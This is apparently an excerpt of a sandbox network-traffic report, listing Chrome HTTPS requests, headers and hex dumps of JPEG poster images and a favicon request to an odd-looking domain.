                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 07 1d 23 69 84 57 80 1d 5d 7a b0 fd 3f 15 c8 6d 1a 72 11 eb f0 df ef 0d 39 37 bc fc 39 48 eb 86 8b e0 18 57 2b 03 03 d8 31 da 63 2d 85 ec 37 e3 03 17 db a8 cb 8e 7f d2 b8 0f d6 35 55 58 d1 c1 1f ae f0 dc 96 2d 22 76 39 dc 83 ea 0b d2 86 0a 7a e0 19 d0 60 41 9d 46 75 18 54 6b 3f ff c4 00 29 11 00 02 02 02 01 04 01 04 03 01 01 01 00 00 00 00 01 02 00 03 04 11 12 05 13 21 31 22 06 10 14 41 15 23 32 51 42 52 ff da 00 08 01 03 01 01 08 00 27 cf db 94 e7 3b 9a 82 ef 33 9f eb ed df 5d e8 f7 d7 7a 9d e4 30 5c b1 ae 40 74 4b 85 1b 22 d5 22 1b 54 7b 36 a0 f1 39 ea 02 49 84 cd c2 d3 70 5c 0b 71 1a 9b fb 1a b6 c6 0c 66 3e 17 f1 bc ee 0c 68 d5 f9 1c 8a 06 5d 0e c1 f7 3b 27 dc 38 fb 7e 70 88 21 b3 7e 89 fd 97 c8 0b ad 1b 34 43 46 d6 c1 af 7e 36 45 a0 bf 09 4b 56 ac 4d
                                                                                                                                                                                          Data Ascii: #iW]z?mr979HW+1c-75UX-"v9z`AFuTk?)!1"A#2QBR';3]z0\@tK""T{69Ip\qf>h];'8~p!~4CF~6EKVM
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: e5 29 ca 4b 54 30 9b 1f 6a 90 10 cf 19 0d 98 fa 09 60 2a 04 6f f4 60 00 c2 82 15 ff 00 9d dd 90 ac aa 47 0d 3f 87 68 4c dc bf 0c 5d a9 75 06 a7 e3 15 ff 00 47 0e f4 0c 56 73 81 be c8 fa a8 ce f3 a1 da 94 0e 4d 95 1b 01 08 60 af c4 33 73 86 dc 18 b6 6c 01 19 f6 d3 5f 63 33 97 ca 18 29 78 b4 be e2 65 7c 34 6a d7 1d 95 c7 b1 86 c2 d1 6d 64 c6 bc 6c c5 7d 90 ca 6e 46 1f d8 6e 72 35 58 24 9d 1f 5e d0 03 17 d0 96 a6 b4 7e db 84 c7 a5 2c 1a 7b 31 ff 00 f6 9c 62 e2 b8 23 90 d6 a3 1d ac 3b 53 a9 76 22 5d e6 1c 3b a9 3b 53 91 a2 01 5b 46 b6 49 f0 19 ef cc c6 00 ad 68 ee 58 05 e4 29 4d 1e e1 62 4b 13 f6 2e 04 00 98 43 01 f0 ec 86 68 2b f1 c6 0f f8 7b 7e 84 b6 af 80 33 f6 44 5b 83 ee 65 5f 5d 80 2a 77 05 6a 19 9a d7 b4 c5 c1 27 fd 26 38 42 0a 77 dc 7f a2 4b 36 c1 33
                                                                                                                                                                                          Data Ascii: )KT0j`*o`G?hL]uGVsM`3sl_c3)xe|4jmdl}nFnr5X$^~,{1b#;Sv"];;S[FIhX)MbK.Ch+{~3D[e_]*wj'&8BwK63


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          94192.168.2.1649829151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:11 UTC445OUTGET /images/M/MV5BNmY5MGM2NWQtNGVkMi00ZmQ1LWFkZWMtYjRkYjhmNTRiNjY0XkEyXkFqcGdeQXVyMjUyNDk2ODc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:11 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 29684
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 682de8c7-4bad-4469-aecc-be1363740f7d
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Fri, 19 Feb 2016 21:07:46 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 18 Nov 2044 17:33:28 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:11 GMT
                                                                                                                                                                                          Age: 293200
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100115-IAD, cache-ewr-kewr1740045-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 ae 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 08 01 00 09 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d5 94 cd 18 5a 07 d8 ec 7d a3 6b fb 36 f9
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4Z}k6
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 21 0b 9a de b5 71 16 4b cb d1 19 46 b5 97 d8 1e a6 56 b9 d3 24 a0 aa 15 0b 9a 1d 70 ca 8e 65 e0 40 b7 9c cc 0a a2 71 32 23 a3 e6 a1 fa a4 7a 0e 90 1c 42 94 44 2d 20 d1 11 12 c1 64 41 d9 ed ac 93 22 ba 51 a4 54 11 93 b7 aa a6 ed 16 05 41 91 61 0b c6 7b ee a7 50 fd 9a 69 3e 73 5e 71 a3 50 c3 31 11 25 9e d5 2a 2a a3 58 1f e7 63 72 32 2f 8a 7a 93 be aa 1b 4f c0 5b 19 03 94 c3 99 37 7d 47 c1 2a 32 be 67 bf 7c c0 a6 47 7a 20 4a 3f 59 3d a5 3f 60 09 a5 cd d1 00 69 b5 dc 36 a3 c4 22 2a f1 7e d1 4a b0 74 c1 53 80 23 76 1b bd ef 09 dc bc f4 ac cb 4d c7 93 ce e0 47 4e c8 a4 68 f1 82 74 57 26 0a 37 8b 8e 89 8c 30 4a 92 43 93 09 98 ca 9c 6f 16 a5 23 c0 52 7e f8 1a f1 e4 a3 e4 7b f0 7b 32 27 ad db 6d a0 27 ad e6 94 86 ac 74 a9 53 2d d5 8b ca 01 e1 33 b7 c8 c2 59 9b e8
                                                                                                                                                                                          Data Ascii: !qKFV$pe@q2#zBD- dA"QTAa{Pi>s^qP1%**Xcr2/zO[7}G*2g|Gz J?Y=?`i6"*~JtS#vMGNhtW&70JCo#R~{{2'm'tS-3Y
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 04 10 12 05 13 21 31 20 14 22 32 41 15 23 33 51 30 42 34 61 24 43 71 52 ff da 00 08 01 01 00 01 08 02 cc cf fc a4 62 06 07 7f 53 90 db 10 90 3d 9d 4d 62 1d 7d 22 7d 7d 5e 67 f2 14 c3 ad a8 00 4b eb aa 43 83 f5 d4 f8 8f d4 2a 58 dd 5b fd 57 d5 5b 90 e5 fc b2 43 d5 cf eb f9 73 e2 69 b5 5f 51 e4 18 cc 17 db f5 2a d7 d1 ea 86 27 53 7c 8c ff 00 26 a7 d1 ea 33 f9 48 fd 53 ff 00 e0 eb ee 33 ea ad 8d d5 1b fe bf c8 db 3e ba e8 35 16 39 01 be 9e bc f9 a6 b0 af e1 73 91 31 e0 61 86 49 12 e5 5e 1c a3 d2 98 6c 28 07 18 ed ab 4b e9 0a 8d 31 9d 8c 2d 9c 4c ed 9f b4 88 44 c4 c4 c6 36 e9 ea 02 78 32 c5 e5 88 6a 2b 9c e2 16 8a 61 f8 67 61 39 44 a5 cf 17 0b 6d 96 16 c7 d4 9e 4c d0 ea 89 f3 3e ad a7 d6 b4 6b cb 0e 33 ea 0f 99 f5 8d 9c c1 a9 61 1a f6 75 20 d7 f9 2e c7 7c c1
                                                                                                                                                                                          Data Ascii: !1 "2A#3Q0B4a$CqRbS=Mb}"}}^gKC*X[W[Csi_Q*'S|&3HS3>59s1aI^l(K1-LD6x2j+aga9DmL>k3au .|
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 5c c6 f8 f8 36 da 25 f4 62 7a 87 d9 9a f5 fb b3 f0 02 7f b9 9d d9 b1 98 5b 3e 22 ee 27 fe 86 21 1f 01 09 d8 45 33 3f 1c cc 43 10 79 19 a1 70 a3 09 1b d9 9a bd 40 b7 c0 d8 99 ca 66 7e e1 3b 3a e4 62 7a 85 7c 6c ad 33 33 04 6f 3b 62 0d c4 58 bb e6 67 e0 60 ce 26 92 2c ea 20 91 e0 8c 43 33 b9 86 7b 30 78 8e 71 33 06 17 cc 6f 82 ec de 7c c1 e2 1d c6 cb 06 de e6 3e 3f ea 51 ea 2c d4 af 31 60 97 79 e2 d0 c1 b9 98 83 62 67 ee 37 99 ec 7c 4f cc 18 0f c3 18 f8 63 6d 26 a9 cb 84 22 37 e4 65 b4 fe a6 31 f0 3b 78 98 ff 00 4c 86 0f 13 1f b9 fb 84 7c 0c 11 be 2a 60 3f f1 68 87 f6 ac 11 bd 99 72 66 5b ee 1d 8e ec 22 c6 af 64 6f d4 61 3d fc 48 f8 63 61 13 de d8 ff 00 83 44 3c b9 82 37 b3 1a 5a 41 63 88 c3 63 07 98 d1 66 3d c5 51 8c c3 e7 cc 63 b7 b8 7e 1e e1 86 0f 30 c1
                                                                                                                                                                                          Data Ascii: \6%bz[>"'!E3?Cyp@f~;:bz|l33o;bXg`&, C3{0xq3o|>?Q,1`ybg7|Ocm&"7e1;xL|*`?hrf["doa=HcaD<7ZAccf=Qc~0
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: f8 fb e7 d0 5d cc 24 5e 9b 7b 71 9f c7 dd c7 9c ce c7 61 bf 4e 38 be bd ad fc 9a 75 22 a7 31 57 30 fc 06 c1 b0 e6 75 1a ff 00 a2 c9 ff 00 6b 22 9f 52 c5 af 95 e4 b2 1b 34 35 85 24 7f 5c d6 7f 81 65 44 62 89 a7 20 a5 3c 74 d5 0a ca 71 3e 6a 13 55 e5 35 0f 02 56 56 ae 0d 8f bf 2c 9e 44 b3 1d b7 e4 0f 2d 42 b3 4d 46 4a 58 60 d9 b6 10 ed 53 f0 65 6d af fc 9a 6b 5f 9d 8d b0 1c b6 c7 c1 ba a8 3e 66 a7 a9 f7 c3 89 fc b7 92 47 f2 de 7c 5b 60 77 66 14 75 26 a5 55 47 f2 72 fd 70 b1 0a 41 d5 48 ed cf e5 1c 7e 23 ac 32 b6 67 f2 4f 85 12 fe a4 d7 73 cd 17 9a 1c 38 3d 52 c2 31 3f 93 b7 25 a7 f2 b6 60 83 fc 9d 86 c1 64 5e a7 68 22 3e b6 e7 4c 18 21 98 ce df a8 44 e8 f5 ab 16 24 4d 47 e4 66 a6 b3 5b 90 67 eb 10 fc 3a 75 6b 65 98 63 a5 ad b1 85 ae b2 ed 16 ba fc 89 ac a1
                                                                                                                                                                                          Data Ascii: ]$^{qaN8u"1W0uk"R45$\eDb <tq>jU5VV,D-BMFJX`Semk_>fG|[`wfu&UGrpAH~#2gOs8=R1?%`d^h">L!D$MGf[g:ukec
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 81 71 30 ae 26 02 af b5 6a d0 36 3c 6e a1 69 e4 99 1c 56 25 89 2d 66 6b 11 61 34 4b 34 5a 94 13 b5 a5 93 65 c5 8d 19 92 53 f5 06 0b 5a 1c 64 d6 71 e3 c6 39 47 33 3e 0d 4b 4d e7 18 13 45 36 7b e7 6c 3a f8 9b 3a 5c 25 37 d4 31 c7 9a cc 25 9f ad b3 4f 84 4a f9 b5 96 45 84 33 1d 89 af e2 e5 35 a5 af fa 93 66 a2 30 5f 9b ab 37 11 8c 7b b3 35 f6 61 63 b3 21 f0 65 8c 88 59 33 5e 4e c3 54 6c ac 6a 27 6a fa 87 15 e6 38 e5 53 62 c1 8e 31 5b 89 ad 60 09 70 39 1d a7 fd 2d 86 20 8a 67 bf 1c ea 99 e6 15 aa c4 c6 41 0e 2c 79 f1 36 08 a2 9e 38 73 d9 0e 76 6e 49 d2 f1 cf 24 99 d9 1a dc 87 2e 48 60 8c 96 e5 68 5f 2c 8c 7c 41 0c 18 b8 ba ac 33 37 32 27 b7 52 c9 13 e1 e2 ca 35 5c 67 e7 65 47 89 1e 9b 93 cb 87 19 4f 7e d6 12 89 b2 4a c6 04 c8 b5 c8 ef 10 2c 4f a5 66 70 6c e7
                                                                                                                                                                                          Data Ascii: q0&j6<niV%-fka4K4ZeSZdq9G3>KME6{l::\%71%OJE35f0_7{5ac!eY3^NTlj'j8Sb1[`p9- gA,y68svnI$.H`h_,|A372'R5\geGO~J,Ofpl
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: c3 92 a7 da a7 cf 97 b8 e6 0e 31 a0 0f 58 b6 e7 be 57 40 4c 8f 74 65 f8 8e 7c 10 c6 32 9e 00 6c 11 e1 42 22 6b e5 70 8c c5 9f 4a 31 31 7b e5 97 11 b1 98 9e 16 34 05 93 4a c3 8b b6 18 9d 33 f2 61 d9 3b 82 2c b2 02 aa 52 7f 15 d3 1b 79 04 2c 8e b3 13 5c 62 18 b8 d0 4d 23 67 8b 2c 62 34 b8 33 fa c3 36 30 38 44 1f 85 24 e3 0e 1f d7 62 88 c7 b1 bb a6 c3 7b 26 31 a7 74 b9 86 2b 63 19 38 bb 66 86 67 67 c6 64 88 4b 13 66 db 85 c3 1c d7 bd d9 0d 9b a3 4e e8 62 8e 3c ae 9c f1 14 6f 78 34 6d 59 a1 72 fa 0b a5 1a ca 0b 25 95 3c 97 d2 99 b1 92 4a 72 3a 10 12 3e 59 86 2f 72 61 1c 4d cc 6c b2 7c 76 63 c2 63 0f 99 d2 cf ba 18 c0 92 51 93 03 5e a7 ea 32 d8 8c 48 f7 be 16 04 cc ae cc 8f 8a 49 3f 06 ba 31 d3 8e e7 98 4e 4f 57 99 f2 bc 0c 3b 9d 93 40 ed 9f 4a b8 52 7f 15 81
                                                                                                                                                                                          Data Ascii: 1XW@Lte|2lB"kpJ11{4J3a;,Ry,\bM#g,b43608D$b{&1t+c8fggdKfNb<ox4mYr%<Jr:>Y/raMl|vccQ^2HI?1NOW;@JR
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 33 3b 0b 7d 94 37 b4 ec c0 db 42 ab 6d 73 ab 9d ab 3b 05 85 9f 08 e7 99 a2 ab 3c de e9 f9 19 da 73 eb 3d 9f 7c d9 61 8e 76 1f 29 8f d2 78 fd 0f 57 de ce f5 ff 00 44 d5 66 b5 a4 3e df 43 bd f8 d9 8a a4 5e 3f 43 a3 fd 1b 0f a3 62 2d 95 7b 29 7c ce bf fc 2f 9f d1 e4 07 0f a3 57 e7 8f d1 64 87 60 3e 7a 17 7e 3d 96 3f 24 7b 5c 33 6e b2 4f f3 41 0e c6 a4 6c b2 87 e7 b0 ce 92 97 64 65 d9 4b b3 d4 a9 9d 45 57 cf 0a 9f 27 49 db 77 61 af b0 96 3f 27 40 55 ca fc f2 ca a1 48 3b eb af 67 8f c8 55 91 aa 39 f5 54 03 e5 85 b4 cc 1d 86 bb 24 f7 e7 56 d0 ab f3 52 ce a7 cc d7 3f bc 79 0f a3 68 be db 2b f4 4a 8b 44 bb 00 78 59 09 e0 a0 37 1c 10 63 82 3b b7 b2 88 df 17 46 05 dd e0 22 f3 47 4e 21 ff 00 55 11 bc 0c ad f0 18 ee 51 1e b1 86 62 91 45 90 37 a8 8b 11 0e 4e d3 94 7a
                                                                                                                                                                                          Data Ascii: 3;}7Bms;<s=|av)xWDf>C^?Cb-{)|/Wd`>z~=?${\3nOAldeKEW'Iwa?'@UH;gU9T$VR?yh+JDxY7c;F"GN!UQbE7Nz
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: f2 e8 ba db 2e 50 06 0e da 9d 5e d4 f7 e1 64 95 e3 04 15 44 f0 c5 97 58 f0 b4 5f 8e 78 f3 29 fe 93 ff c4 00 27 10 00 02 02 01 03 03 05 01 01 01 01 00 00 00 00 00 01 11 00 21 31 41 51 61 10 71 81 91 a1 b1 c1 f0 d1 f1 e1 20 ff da 00 08 01 01 00 01 3f 21 68 0a 33 19 97 ff 00 95 d1 45 00 9a 8a ef 52 88 01 3c 10 78 f9 88 c1 0d 09 34 16 74 84 64 82 c1 90 c3 10 5b e3 da 36 d3 32 03 b9 50 5b 3e ea 06 26 dc 02 87 fb a5 f6 84 45 3f 77 88 48 18 28 d8 c6 d0 8e f8 cd 8a ef 01 b9 78 35 df 68 f1 33 61 ac 53 f0 7f 50 be 41 59 3d a2 c9 1a 5d ef 6f fb 10 d5 5b eb 2c 6a 6b bb b4 08 12 40 07 5e dd 0a c9 a7 fe c2 8b 98 14 f7 bf 68 dd 23 b8 99 a9 20 35 6f 17 01 16 f9 ff 00 53 67 f5 e2 2e bf 9c 69 0f f9 fc 45 e7 d0 07 f6 01 97 ee 79 87 1a 45 a9 6f ac 4c 28 35 fd ed 3f 70 fe 42
                                                                                                                                                                                          Data Ascii: .P^dDX_x)'!1AQaq ?!h3ER<x4td[62P[>&E?wH(x5h3aSPAY=]o[,jk@^h# 5oSg.iEyEoL(5?pB
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: d9 fb 88 73 b7 af cd 41 d3 08 3e 6b 3e 75 98 78 c7 d4 cd c9 37 9d 09 99 ee c4 b0 e0 4c d7 78 1f aa 0e 79 40 c1 a3 fc 84 83 cd 68 02 b4 8f c3 90 3c a1 a3 f3 30 5c 1c 71 35 3c e2 8d 82 26 30 15 41 80 82 51 9e 6c 06 3b 0b 09 c2 50 f7 fe 20 1d 03 42 46 6f 30 7f 89 0f 1e 02 24 5c b5 8f 24 f7 86 64 20 87 fc 50 aa 64 7b c1 fd da f4 ba 39 41 0e 2d fd 00 ea 34 03 b0 f8 9f bb 8e b8 84 0d ab 46 e7 44 01 79 3a e6 b1 72 ce 3f 7c 40 71 a0 24 b9 5f f5 19 97 43 e9 a7 a8 86 04 48 2e 41 d7 71 39 ba 83 63 fa c4 13 b5 1e 0d b8 15 46 70 9c fd cc 92 f8 67 f0 80 1d ed 16 77 f5 96 ce 59 81 90 a5 b1 df fc 9f 1d fe de 1a 20 8a 80 8a 1a 00 f1 c7 31 c9 88 40 4f f0 c7 d4 3b 5d 03 63 23 7b 8c 09 a6 31 a0 30 19 0c e2 dc 01 38 83 0c 42 09 43 53 08 59 98 cc cf 7e a0 ae 33 01 17 fc 3e 9c
                                                                                                                                                                                          Data Ascii: sA>k>ux7Lxy@h<0\q5<&0AQl;P BFo0$\$d Pd{9A-4FDy:r?|@q$_CH.Aq9cFpgwY 1@O;]c#{108BCSY~3>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          95192.168.2.164982413.227.8.84436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1021OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                          Host: arketingefifortw.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          device-memory: 8
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          viewport-width: 1280
                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                          dpr: 1
                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://arketingefifortw.com/M0xOQ0JSLiM3
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Cookie: AWSALB=TDYilUxhsUoCOBa2e2mZLho4r1wbn7yH9WgppwaEQ2sjXUgJQr8q4Rm/GXpKF2lsD7wmzRd3FYKjEhxmOd+t15VEYIeH515YNAjrJWZf/e5fEp+/5KUaGhbaRYgH
                                                                                                                                                                                          2024-12-15 11:38:12 UTC874INHTTP/1.1 204 No Content
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          Accept-CH: DPR, Width, Viewport-Width, Device-Memory, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List
                                                                                                                                                                                          Set-Cookie: AWSALB=5lIKnVG2/v2djhN7JjJYFeZNFMlEB/P1EhUfJxFxIF8hLtWpn4j5f7Udf6S+obglvTVywMv9z1PLzPCDxomK46OftQICm5xzygJdvicv/YYxTLizNEqSPDobzurU; Expires=Sun, 22 Dec 2024 11:38:12 GMT; Path=/
                                                                                                                                                                                          Set-Cookie: AWSALBCORS=5lIKnVG2/v2djhN7JjJYFeZNFMlEB/P1EhUfJxFxIF8hLtWpn4j5f7Udf6S+obglvTVywMv9z1PLzPCDxomK46OftQICm5xzygJdvicv/YYxTLizNEqSPDobzurU; Expires=Sun, 22 Dec 2024 11:38:12 GMT; Path=/; SameSite=None
                                                                                                                                                                                          Server: openresty/1.17.8.2
                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                          Via: 1.1 bd15b9fe20805eb37db52439d6b42ff4.cloudfront.net (CloudFront)
                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                          X-Amz-Cf-Id: U3dbylT-cLP8zp1ms8SpkeRl5z9Trx-VTJNkVnpm6jYexkdT_5b1dA==


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          96192.168.2.1649832151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:12 UTC413OUTGET /images/M/MV5BMTkzNzM0NzY5OF5BMl5BanBnXkFtZTcwODgyMzk3NA@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:12 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 31386
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 55999ae1-8456-4cf7-b6bb-27b86f342c1d
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 24 Mar 2011 18:49:15 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 08 Dec 2044 11:55:20 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          Age: 171772
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100024-IAD, cache-ewr-kewr1740044-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 d8 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 04 05 06 07 03 08 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f2 61 ba 1f aa f3 35 0e c5 33 37 40 e0 4e
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4a537@N
                                                                                                                                                                                          2024-12-15 11:38:12 UTC1378INData Raw: a7 d3 f3 a0 aa dc 38 6e 3a 4e 81 3f e2 ef ad 45 cf 64 39 68 ec 68 77 1e f8 8d e3 49 4d 48 cb c0 c0 71 de d5 73 79 64 c3 cd da 5d de 49 70 aa c7 a5 a3 52 b1 4d db 7c 8e b7 a9 28 c8 6f 47 3a 32 25 fb 72 dd 65 df 56 b2 fa a2 b5 d2 e3 99 96 4f 9d f2 ab 34 7e 95 95 84 4b 85 8d 18 de ec 7b 95 ba 25 a7 8f 4c 57 ae 72 f7 ce 3b f2 dd da 93 31 9d 5b b4 4c 6e 65 1e 47 b9 15 01 5d d4 a8 c4 36 95 4c b9 1e 87 77 9c e9 92 34 aa bb ab cb 78 90 ad 4a 59 27 e7 cd 67 cd 8b 65 99 a0 5d 3a e7 9c 70 e7 1c ae b6 99 7c 6b 1d d4 ec 8c 22 17 25 db eb 06 6b bd 32 64 57 a0 98 6a 56 67 ad 53 11 a4 f7 77 d3 76 47 57 27 a0 b9 ea 52 91 3f 3e 2e 8f 7e 93 32 b9 9b 34 11 70 cd fd 35 96 98 15 aa 0d 9d ba a7 a1 30 8d 5e 49 fc c2 d9 1a 14 b3 5a 8a 1e 2d e8 4c 85 69 53 10 2e 74 7f a7 e3 1e 90
                                                                                                                                                                                          Data Ascii: 8n:N?Ed9hhwIMHqsyd]IpRM|(oG:2%reVO4~K{%LWr;1[LneG]6Lw4xJY'ge]:p|k"%k2dWjVgSwvGW'R?>.~24p50^IZ-LiS.t
